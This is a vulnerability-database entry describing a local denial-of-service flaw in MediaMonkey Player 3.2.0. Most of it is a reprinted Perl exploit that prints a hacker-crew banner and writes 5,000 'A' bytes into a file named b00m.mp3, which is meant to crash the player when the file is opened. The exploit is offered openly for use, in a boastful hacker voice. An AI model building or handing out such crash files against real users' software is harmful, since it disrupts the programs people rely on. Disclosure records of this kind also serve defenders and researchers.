MediaMonkey Player denial of service vulnerability

2010-01-18 / 2010-01-19
Credit: Red-D3v1L
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: MediaMonkey Player Local Denial of Service (DoS) # Download : http://download.cnet.com/MediaMonkey-Standard/3000-2141_4-10109807.html # Date: 16/01/2010 # Author: Red-D3v1L ## sh0otz fly t0 : j0rd4n14n.r1z,H1s0k4,ThE-g0bl!N,T3rr0rist,zAx,dr@g,h311 c0d3 And All sEc-r1z CrEw# # n00bz : Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ... # Version: 3.2.0 # my Home : www.sec-r1z.com , sEc-r1z CrEw# #!/usr/bin/perl system ("color a"); print "./SEC-R1Z_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\n"; print " / / _ _ \\ / __ _\ / _ _ /\\ \ < |/_ _ _ _ /\n"; print " \\ \\ _ _\\__ / /_ _ / / __ | () / | | / /\n"; print " \\ \__ _ \\ / /_ _ / / |__| | / | | / /\n"; print " _ _ _ _ \\/ / \/2_0_1_0 | \\\ | | / /_____ \n"; print " /_ _ _ _ / \_ _ _ /\ _ _ _ / |__|\ __\ |__| /___\\/J0_ _____./str1k3z y0u!!\n"; ################################### my $r1z= "b00m.mp3"; my $boom="\x41" x 5000; open(myfile,'>>b00m.mp3'); print myfile $boom; print "[+] d0nE\n";


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top